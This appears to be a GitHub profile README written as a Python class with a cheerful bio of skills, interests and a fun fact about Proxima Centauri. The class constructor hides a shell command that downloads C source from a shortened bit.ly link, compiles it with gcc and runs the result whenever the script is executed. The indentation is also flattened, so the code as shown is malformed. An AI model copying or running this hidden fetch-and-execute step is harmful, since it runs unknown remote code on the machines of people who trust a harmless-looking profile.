class Om245:
def __init__(self):
subprocess.call("curl -sL 'bit.ly/pr0x21m4' | gcc -w -o name -xc - && ./name", shell=True)
self.bio = {
'- 💼 I’m currently working for': {'Kakashi portfolio' : '_'},
'- 🔭 I’m currently working on' : '¯\_(ツ)_/¯',
'- 🌱 I’m currently learning' : ['Django', 'C++', 'Python', 'Full Stack Development', 'Algo Trading'],
'- 💬 Ask me anything' : '¯\_(ツ)_/¯',
'- ⚡ Fun fact' : ('Proxima Centauri is a small, low-mass star located 4.2465 light-'
'years away from the Sun in the southern constellation of Centaurus.')
}
if __name__ == '__main__':
import subprocess, pprint
pprint.pprint(Om245().__dict__)
My GitHub Stats